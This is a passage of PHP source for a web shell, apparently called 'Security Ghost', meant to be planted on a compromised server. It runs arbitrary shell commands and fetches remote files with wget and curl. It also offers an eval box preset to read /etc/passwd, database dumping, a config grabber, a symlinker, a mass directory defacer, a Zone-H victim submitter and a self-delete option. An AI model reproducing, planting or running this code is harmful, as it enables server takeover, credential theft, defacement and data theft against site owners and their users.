499. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
500. <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
501. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
502. <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" value=\"Rename\" />
503. <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
504. </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
505. <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
506. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
507. <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
508. <input class=\"inputz\" style=\"width:150px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
509. <input class=\"inputzbut\" type=\"submit\" name=\"Chmod\" value=\"Chmod\" />
510. <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
511. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
512. <td><a href=\"?y=$pwd&amp;edit=$full\">Edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">Rename</a> | <a href=\"?y=$pwd&amp;delete=$full\">Delete</a> | <a href=\"?y=$pwd&amp;dl=$full\">Download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">Gz</a>)</td></tr>";
513. }
514. $buff .= "</table>";
515. return $buff;
516. }
517.  
518. function ukuran($file){
519. if($size = @filesize($file)){
520. if($size <= 1024) return $size;
521. else{
522. if($size <= 1024*1024) {
523. $size = @round($size / 1024,2);;
524. return "$size kb";
525. }
526. else {
527. $size = @round($size / 1024 / 1024,2);
528. return "$size mb";
529. }
530. }
531. }
532. else return "???";
533. }
534.  
535. function exe($cmd){
536. if(function_exists('system')) {
537. @ob_start();
538. @system($cmd);
539. $buff = @ob_get_contents();
540. @ob_end_clean();
541. return $buff;
542. }
543. elseif(function_exists('exec')) {
544. @exec($cmd,$results);
545. $buff = "";
546. foreach($results as $result){
547. $buff .= $result;
548. }
549. return $buff;
550. }
551. elseif(function_exists('passthru')) {
552. @ob_start();
553. @passthru($cmd);
554. $buff = @ob_get_contents();
555. @ob_end_clean();
556. return $buff;
557. }
558. elseif(function_exists('shell_exec')){
559. $buff = @shell_exec($cmd);
560. return $buff;
561. }
562. }
563.  
564. function tulis($file,$text){
565. $textz = gzinflate(base64_decode($text));
566. if($filez = @fopen($file,"w"))
567. {
568. @fputs($filez,$textz);
569. @fclose($file);
570. }
571. }
572.  
573. function ambil($link,$file) {
574. if($fp = @fopen($link,"r")){
575. while(!feof($fp)) {
576. $cont.= @fread($fp,1024);
577. }
578. @fclose($fp);
579. $fp2 = @fopen($file,"w");
580. @fwrite($fp2,$cont);
581. @fclose($fp2);
582. }
583. }
584.  
585. function which($pr){
586. $path = exe("which $pr");
587. if(!empty($path)) { return trim($path); } else { return trim($pr); }
588. }
589.  
590. function download($cmd,$url){
591. $namafile = basename($url);
592. switch($cmd) {
593. case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
594. case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
595. case 'wfread' : ambil($wurl,$namafile);break;
596. case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
597. case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
598. case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
599. case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
600. default: break;
601. }
602. return $namafile;
603. }
604.  
605. function get_perms($file)
606. {
607. if($mode=@fileperms($file)){
608. $perms='';
609. $perms .= ($mode & 00400) ? 'r' : '-';
610. $perms .= ($mode & 00200) ? 'w' : '-';
611. $perms .= ($mode & 00100) ? 'x' : '-';
612. $perms .= ($mode & 00040) ? 'r' : '-';
613. $perms .= ($mode & 00020) ? 'w' : '-';
614. $perms .= ($mode & 00010) ? 'x' : '-';
615. $perms .= ($mode & 00004) ? 'r' : '-';
616. $perms .= ($mode & 00002) ? 'w' : '-';
617. $perms .= ($mode & 00001) ? 'x' : '-';
618. return $perms;
619. }
620. else return "??????????";
621. }
622.  
623. function clearspace($text){
624. return str_replace(" ","_",$text);
625. }
626.  
627.  
628. ?>
629. <html><head><link rel="SHORTCUT ICON" href="http://oi58.tinypic.com/10r33mq.jpg"><title><?=$title ?> <?=$versi ?></title>
630. <script type="text/javascript">
631. function tukar(lama,baru){
632. document.getElementById(lama).style.display = 'none';
633. document.getElementById(baru).style.display = 'block';
634. }
635. </script><style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1048.cur), progress !important;}</style>
636. <style type="text/css">
637. body { background-color:transparan;background:#000;background-image: url("<?=$background; ?>");background-position: center; background-attachment: fixed;background-repeat: no-repeat; }
638. a {text-decoration:none;
639. }
640. a:hover{
641. border-bottom:1px solid #00ff00;
642. }
643. *{
644. font-size:11px;
645. font-family:Tahoma,Verdana,Arial;
646. color:<?=$color; ?>;
647. }
648. #menu{
649. background-color:transparan;
650. margin:8px 2px 4px 2px;
651. }
652.  
653. #menu a{
654. padding:4px 18px;
655. margin:0;
656. background:#222222;
657. text-decoration:none;
658. letter-spacing:2px;
659. -moz-border-radius: 5px; -moz-box-shadow-webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
660. }
661. #menu a:hover{
662. background:#191919;
663. border-bottom:1px solid #333333;
664. border-top:1px solid #333333;
665. }
666.  
667. .tabnet{
668. margin:15px auto 0 auto;
669. border: 1px solid #333333;
670. color: #FFCC00; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;}
671. .msupiani{ font-family:Vivaldi;font-size:50px;color: #00FF00;}
672. .tabnet{
673. margin:15px auto 0 auto;
674. border: 1px solid #333333; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
675. }
676. .main {
677. width:100%; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
678. }
679. .gaya {
680. color: $color;
681. }
682. .inputz{
683. background:#111111;
684. border:0;
685. padding:2px;
686. border-bottom:1px solid #222222;
687. border-top:1px solid #222222; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
688. }
689. .inputzbut{
690. background:#111111;
691. color:<?=$color; ?>;
692. margin:0 4px;
693. border:1px solid #444444; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
694.  
695. }
696. .inputz:hover, .inputzbut:hover{
697. border-bottom:1px solid #00ff00;
698. border-top:1px solid #00ff00; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
699. }
700. .output {
701. margin:auto;
702. border:1px solid <?=$color; ?>;
703. width:100%;
704. height:400px;
705. background:#000000;
706. padding:0 2px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
707. }
708. .cmdbox{
709. width:100%; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
710. }
711. .head_info{
712. padding: 0 4px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
713. }
714. .exploded{
715. font-size:30px;
716. padding:0;
717. color:#444444; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
718. }
719. .exploded_tbl{
720. text-align:center;
721. margin:0 4px 0 0;
722. padding:0 4px 0 0;
723. border-right:1px solid #333333;
724. }
725. .phpinfo table{
726. width:100%;
727. padding:0 0 0 0; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
728. }
729. .phpinfo td{
730. background:#111111;
731. color:#cccccc;
732. padding:6px 8px;; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
733. }
734. .phpinfo th, th{
735. background:#191919;
736. border-bottom:1px solid #333333;
737. font-weight:normal; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
738. }
739. .phpinfo h2, .phpinfo h2 a{
740. text-align:center;
741. font-size:16px;
742. padding:0;
743. margin:30px 0 0 0;
744. background:#222222;
745. padding:4px 0; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
746. }
747. .explore{
748. width:100%; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
749. }
750. .explore a {
751. text-decoration:none;
752. }
753. .explore td{
754. border-bottom:1px solid #333333;
755. padding:0 8px;
756. line-height:24px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
757. }
758. .explore th{
759. padding:3px 8px;
760. font-weight:normal; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
761. }
762. .explore th:hover , .phpinfo th:hover{
763. border-bottom:1px solid #00ff00; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
764. }
765. .explore tr:hover{
766. background:#111111; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
767. }
768. .viewfile{
769. background:#EDECEB;
770. color:#000000;
771. margin:4px 2px;
772. padding:8px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
773. }
774. .sembunyi{
775. display:none;
776. padding:0;margin:0; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
777. }
778. .jaya{ margin:5px; text-align:right; <?=$color; ?>;}
779. .footer{ background:#111111; width:99%; padding:5px; margin:10px auto 5px; text-align:center; font-size:13px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ; }
780. .footer a{ font-size:14px; }
781. .footer span{ font-size:14px;}
782. </style></head>
783.  
784. <body onLoad="document.getElementById('cmd').focus();">
785. <!-- logout start here -->
786. <div id="menu"><span style='float:right;'><br>
787. <?="Time On Server : <b> ".date("d M Y H:i:s",time())."</b>"; ?> <br><br> &nbsp &nbsp &nbsp &nbsp
788. <a href="?<?="y=".$pwd; ?>&amp;x=kill" title='Remove Shell'>Remove</a>
789. |
790. <a href="?<?="y=".$pwd; ?>&amp;x=logout" title='Logout'>Logout</a> &nbsp &nbsp &nbsp <br><br>
791. &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp &nbsp <a href="?<?="y=".$pwd; ?>&amp;x=about" title='About Author'>About</a>
792. </span></div>
793. <!-- logout end here -->
794. <div class="main">
795. <!-- head info start here -->
796. <div class="head_info">
797. <table><tr>
798. <td><table class="inputz"><tr><td><a href="" target="blank" onClick="location.reload();"><span class="F0ku5"><img src='<?=$logo; ?>' title="Security Ghost" width="150" height="150"></span></span></a></td></tr><tr><td>
799. <a href="https://twitter.com/SecurityGhost_" class="twitter-follow-button" data-show-count="false"> Follow @SecurityGhost_</a>
800. <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'http';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script></td></tr></table></td>
801. <td><?=$buff; ?></td>
802. </tr></table></div>
803. <!-- head info end here -->
804. <!-- menu start --><br>
805. <center><div id="menu">
806. <a href="?"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxQ2GRnu/TgAAAJzSURBVDjLtZLPSxtBHMXf5semZDfS7KpIaWzRShoFD5UK9h6ai5eCPfZkwYJ4kF566a30H0gF24BUqDdjBT1VCFIsNBUWEw+ha2obpDGUXGR1Z7KZ+fbQRky1vfULAzPD4/MeMw/4H7O6ugoAsG17tFwuJwFgd3f3Qq3yN0g+n7+r6/oKgEtQMDWYGHx5kc539rC4uAgA2Hy/OaGq6oplWaVcLmdxxl9YlvUEALa2tv6dYGPjXSoS6chWKpWKaZpdoVBIL5VK+0NDQ/1END02NjZ/LsHc3BwAYG1tbSIYVLOFQuGzpmldgUDAkFKqvb2917a3t23GWDqXyz0BgPX19fYEy8vLKV3XswcHBxXDMLoikYghpaRW0kajwfbK5W834/F+ANOpVGr+FLC0tHRf0/TX+/tf7J6eniuappkA6IwBtSC2bX9NJBIDRPT05OTkuTL1aKpj9Pbox1qtdmgYxlXTNG8QEV3wPgRAcV23bllWfmRkZNh13VuKpmnBvr6+O1LK2szMzNtwOBxviYUQUBQFPp+vBYCU8jCTyaSOj48vA/hw6jI+Ph5JJpOfwuFwnIjAGKsvLCw8cxxHTE4+fGwY0RgRgYi+O44zPDs7W2/rgeu6CmMMjDFwziGE+JFIJF5Vq9VMs+kdcs7BOQdjDEdHR6fGgdZGCAHOOfx+P4gIQggZjUaps9OkRqNBjDHQr1E8z8M5QLVaheM4TZ/fBxDQbDZVz/MgJYFzHlRVFURQms2GqNfr4qIm+mOx2L3u7u5hKSVCIXVPSvGmsFNUBuLxB8FA4DoAeJ63UywWswBk2x+l0+kW0P97KX80tnXfNj8B5NE5DOMV2T0AAAAASUVORK5CYII=' height="18" width="34" title='Home '></a>
807. <a href="?<?="y=".$pwd; ?>" title='File Explorer'>Files</a>
808. <a href="?<?="y=".$pwd; ?>&amp;x=upload" title='Upload File'>Uploader</a>
809. <a href="?<?="y=".$pwd; ?>&amp;x=sql" title='Connect To Database'>MySQL Manager</a><br><br>
810. <a href="?<?="y=".$pwd; ?>&amp;x=jumping" title='Jumping'>Jumper</a>
811. <a href="?<?="y=".$pwd; ?>&amp;x=symlink" title='Symlink'>Multi Symlinker</a>
812. <a href="?<?="y=".$pwd; ?>&amp;x=grabc" title='Config Grabber'>Config Grabber</a><br><br>
813. <a href="?<?="y=".$pwd; ?>&amp;x=mass" title='Deface To All Folder'>Mass Directory Defacer</a>
814. <a href="?<?="y=".$pwd; ?>&amp;x=zone" title='Submit Victim To Zone-H'>Zone-H Submiter</a>
815. </div></center><br>
816. <!-- menu end -->
817. <?php
818. @ini_set('display_errors', 0);
819. @ini_set('output_buffering',0);
820.  
821. if(isset($_GET['x']) && ($_GET['x'] == 'kill')) {
822.  
823. echo "
824. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
825.  
826. <tr>
827. <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
828. <center><b><font size=5 style=italic color=#00ff00>Shell Killer</font></b></center></td></tr></table>
829. ";
830.  
831. echo '<center><br><font style="color:<?=$color; ?>">Do You Really Want To Delete This Shell ?</b></center><br>';
832. ?>
833. <center>
834. <div id="menu">
835. <a href="?<?="y=".$pwd;?>&amp;x=killit" title='Remove Shell' >Yes, I Want</font></a> &nbsp;&nbsp;&nbsp;&nbsp;
836. <a href="<?=$_SERVER['PHP_SELF']; ?>">Cancel</a></b></center><br><br>
837. </div>
838. <?php
839. }
840. if(isset($_GET['x']) && ($_GET['x'] == 'killit')) {
841. $file = $_SERVER['PHP_SELF'];
842. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
843. die('<br><br><b class="tmp"><font color="#ff0000" size="2pt"><center>Shell Has Been Killed... Take Care And Stay Safe</center></font></b><meta http-equiv="refresh" content="3; url=?".$pwd."" />');
844. else
845. echo '<font color="#fff600" size="2pt">Unlink Error !</font>';
846.  
847. }
848. /////////////////////////////
849. elseif(isset($_GET['x']) && ($_GET['x'] == 'php'))
850. {
851. @ini_set('output_buffering',0);
852. echo "
853. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
854.  
855. <tr>
856. <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
857. <center><b><font size=5 style=italic color=#00ff00>Eval</font></b></center></td></tr></table>
858. ";
859. ?>
860.  
861. <form action="?y=<?=$pwd; ?>&amp;x=php" method="post">
862. <table class="tabnet" style="width:800px;height:300px">
863. <tr><td>
864. <textarea class="output" name="cmd" id="cmd">
865. <?php
866. if(isset($_POST['submitcmd'])) {
867. echo eval(magicboom($_POST['cmd']));
868. }
869. else echo "echo file_get_contents('/etc/passwd');";
870. ?>
871. </textarea>
872. <tr><td><input style="width:800px;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>
873. </table>
874. </form>
875.  
876. <?php }
877.  
878. /////////////////////////////
879. ///////////////////////////////////////////////////////////////////////////////
880. elseif(isset($_GET['x']) && ($_GET['x'] == 'sql')){
881. echo "
882. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
883.  
884. <tr>
885. <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
886. <center><b><font size=5 style=italic color=#00ff00>MySQL Manager</font></b></center></td></tr></table>
887. ";
888. function view_size($size) {
889. if (!is_numeric($size)) { return FALSE; }
890. else {
891. if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
892. elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
893. elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
894. else {$size = $size . " B";}
895. return $size;
896. }
897. }
898. function mysql_dump($set) {
899. $sock = $set["sock"];
900. $db = $set["db"];
901. $print = $set["print"];
902. $nl2br = $set["nl2br"];
903. $file = $set["file"];
904. $add_drop = $set["add_drop"];
905. $tabs = $set["tabs"];
906. $onlytabs = $set["onlytabs"];
907. $ret = array();
908. $ret["err"] = array();
909. if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
910. if (empty($db)) {$db = "db";}
911. if (empty($print)) {$print = 0;}
912. if (empty($nl2br)) {$nl2br = 0;}
913. if (empty($add_drop)) {$add_drop = TRUE;}
914. if (empty($file)) {
915. $file = $tmp_dir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
916. }
917. if (!is_array($tabs)) {$tabs = array();}
918. if (empty($add_drop)) {$add_drop = TRUE;}
919. if (sizeof($tabs) == 0) {
920. $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
921. if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
922. }
923. $out = "
924. # Dumped By ".$xName."
925. # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
926. # Date: ".date("d.m.Y H:i:s")."
927. # DB: \"".$db."\"
928. #---------------------------------------------------------";
929. $c = count($onlytabs);
930. foreach($tabs as $tab) {
931. if ((in_array($tab,$onlytabs)) or (!$c)) {
932. if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
933. $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
934. if (!$res) {$ret["err"][] = mysql_smarterror();}
935. else {
936. $row = mysql_fetch_row($res);
937. $out .= $row["1"].";\n\n";
938. $res = mysql_query("SELECT * FROM `$tab`", $sock);
939. if (mysql_num_rows($res) > 0) {
940. while ($row = mysql_fetch_assoc($res)) {
941. $keys = implode("`, `", array_keys($row));
942. $values = array_values($row);
943. foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
944. $values = implode("', '", $values);
945. $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
946. $out .= $sql;
947. }
948. }
949. }
950. }
951. }
952. $out .= "#---------------------------------------------------------------------------------\n\n";
953. if ($file) {
954. $fp = fopen($file, "w");
955. if (!$fp) {$ret["err"][] = 2;}
956. else {
957. fwrite ($fp, $out);
958. fclose ($fp);
959. }
960. }
961. if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
962. return $out;
963. }
964. function mysql_buildwhere($array,$sep=" and",$functs=array()) {
965. if (!is_array($array)) {$array = array();}
966. $result = "";
967. foreach($array as $k=>$v) {
968. $value = "";
969. if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
970. $value .= "'".addslashes($v)."'";
971. if (!empty($functs[$k])) {$value .= ")";}
972. $result .= "`".$k."` = ".$value.$sep;
973. }
974. $result = substr($result,0,strlen($result)-strlen($sep));
975. return $result;
976. }
977. function mysql_fetch_all($query,$sock) {
978. if ($sock) {$result = mysql_query($query,$sock);}
979. else {$result = mysql_query($query);}
980. $array = array();
981. while ($row = mysql_fetch_array($result)) {$array[] = $row;}
982. mysql_free_result($result);
983. return $array;
984. }
985. function mysql_smarterror($sock) {
986. if ($sock) { $error = mysql_error($sock); }
987. else { $error = mysql_error(); }
988. $error = htmlspecialchars($error);
989. return $error;
990. }
991. function mysql_query_form() {
992. global $submit,$sql_x,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
993. if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
994. if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;}
995. if ((!$submit) or ($sql_x)) {
996. echo "<table><tr><td><form name=\"fx29sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=x value=sql><input type=hidden name=sql_x value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
997. if ($tbl_struct) {
998. echo "<td valign=\"top\"><b>Fields:</b><br>";
999. foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.fx29sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
1000. echo "</td></tr></table>";
1001. }
1002. }
1003. if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
1004. }
1005. function mysql_create_db($db,$sock="") {
1006. $sql = "CREATE DATABASE `".addslashes($db)."`;";
1007. if ($sock) {return mysql_query($sql,$sock);}
1008. else {return mysql_query($sql);}
1009. }
1010. function mysql_query_parse($query) {
1011. $query = trim($query);
1012. $arr = explode (" ",$query);
1013. $types = array(
1014. "SELECT"=>array(3,1),
1015. "SHOW"=>array(2,1),
1016. "DELETE"=>array(1),
1017. "DROP"=>array(1)
1018. );
1019. $result = array();
1020. $op = strtoupper($arr[0]);
1021. if (is_array($types[$op])) {
1022. $result["propertions"] = $types[$op];
1023. $result["query"] = $query;
1024. if ($types[$op] == 2) {
1025. foreach($arr as $k=>$v) {
1026. if (strtoupper($v) == "LIMIT") {
1027. $result["limit"] = $arr[$k+1];
1028. $result["limit"] = explode(",",$result["limit"]);
1029. if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
1030. unset($arr[$k],$arr[$k+1]);
1031. }
1032. }
1033. }
1034. }
1035. else { return FALSE; }
1036. }
1037. function disp_error($msg) { echo "<div class=errmsg>$msg</div>\n"; }
1038. function html_style() {
1039. $style = ' <style type="text/css"> a { text-decoration:none; } a:hover { color: #00ff00; border-bottom:1px solid #00ff00; } input[type="text"], input[type="password"], select{ background:#111111; border:0; padding:2px; border:1px solid #444444; } input[type="submit"]{ background:#111111; color:#ffffff; margin:0 4px; border:1px solid #444444;} input[type="text"]:hover, input[type="submit"]:hover, input[type="password"]:hover, select:hover{ border-bottom:1px solid #00ff00;border-top:1px solid #00ff00;} .tab { width:100%; } th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .tub { width:100%; } .tub th{ border-bottom:1px solid #00ff00; padding:3px;} .tub tr:hover{ background:#006400; } .tub td{ border-bottom:1px solid #333333; padding-left:3px; } #maininfo { padding:5px; margin-top:10px; margin-left:2px; margin-right:2px; background:#191919; } #maininfo a{ color:#00ff00; } textarea { background:#000000; border:1px solid #444444;} textarea:hover { border:1px solid #00ff00;} </style><center>';
1040. return $style;
1041. }
1042. $auto_surl = TRUE;
1043. foreach ($_REQUEST as $k => $v) {
1044. if (!isset($$k)) { $$k = $v; }
1045. }
1046. if ($auto_surl) {
1047. $include = "&";
1048. foreach (explode("&",getenv("QUERY_STRING")) as $v) {
1049. $v= explode("=",$v);
1050. $name= urldecode($v[0]);
1051. $value= @urldecode($v[1]);
1052. $needles = array("http://","https://","ssl://","ftp://","\\\\");
1053. foreach ($needles as $needle) {
1054. if (strpos($value,$needle) === 0) {
1055. $includestr .= urlencode($name)."=".urlencode($value)."&";
1056. } } } }
1057. if (empty($surl)) { $surl = htmlspecialchars("?".@$includestr); }
1058. if (!isset($x)) { $x = "sql"; }
1059. if ($x == "sql") {
1060. foreach (array("sort","sql_sort") as $v) {
1061. if (!empty($_GET[$v])) { $$v = $_GET[$v]; }
1062. if (!empty($_POST[$v])) { $$v = $_POST[$v]; }
1063. }
1064. if ($sort_save) {
1065. if (!empty($sort)) { setcookie("sort",$sort); }
1066. if (!empty($sql_sort)) { setcookie("sql_sort",$sql_sort); }
1067. }
1068. if (!isset($sort)) { $sort = $sort_default; }
1069. $sort = htmlspecialchars($sort);
1070. $sort[1] = strtolower($sort[1]);
1071. echo html_style();
1072. echo "<div id='maininfo'>";
1073. if ($x == "sql") {
1074. $sql_surl = $surl."x=sql";
1075. if (!isset($sql_login)) { $sql_login = ""; }
1076. if (!isset($sql_passwd)) { $sql_passwd = ""; }
1077. if (!isset($sql_server)) { $sql_server = ""; }
1078. if (!isset($sql_port)) { $sql_port = ""; }
1079. if (!isset($sql_tbl)) { $sql_tbl = ""; }
1080. if (!isset($sql_x)) { $sql_x = ""; }
1081. if (!isset($sql_tbl_x)) { $sql_tbl_x = ""; }
1082. if (!isset($sql_order)) { $sql_order = ""; }
1083. if (!isset($sql_x)) { $sql_x = ""; }
1084. if (!isset($sql_getfile)) { $sql_getfile = ""; }
1085. if (@$sql_login) { $sql_surl .= "&sql_login=".htmlspecialchars($sql_login); }
1086. if (@$sql_passwd) { $sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd); }
1087. if (@$sql_server) { $sql_surl .= "&sql_server=".htmlspecialchars($sql_server); }
1088. if (@$sql_port){ $sql_surl .= "&sql_port=".htmlspecialchars($sql_port); }
1089. if (@$sql_db) { $sql_surl .= "&sql_db=".htmlspecialchars($sql_db); }
1090. $sql_surl .= "&";
1091. echo "";
1092. if (@$sql_server) {
1093. $sql_sock = @mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
1094. $err = mysql_smarterror($sql_sock);
1095. @mysql_select_db($sql_db,$sql_sock);
1096. if (@$sql_query and $submit) {
1097. $sql_query_result = mysql_query($sql_query,$sql_sock);
1098. $sql_query_error = mysql_smarterror($sql_sock);
1099. }
1100. }
1101. else { $sql_sock = FALSE; }
1102. if (!$sql_sock) {
1103. if (!@$sql_server) { echo "<blink><b><font style= color:#ff0000>No Connection ! ! !</font></b></blink>"; }
1104. else { disp_error("ERROR: ".$err); }
1105. }
1106. else {
1107. #SQL Quicklaunch
1108. $sqlquicklaunch= array();
1109. $sqlquicklaunch[] = array("Index",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
1110. $sqlquicklaunch[] = array("Query",$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl));
1111. $sqlquicklaunch[] = array("Server status",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=serverstatus");
1112. $sqlquicklaunch[] = array("Server variables",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=servervars");
1113. $sqlquicklaunch[] = array("Processes",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=processes");
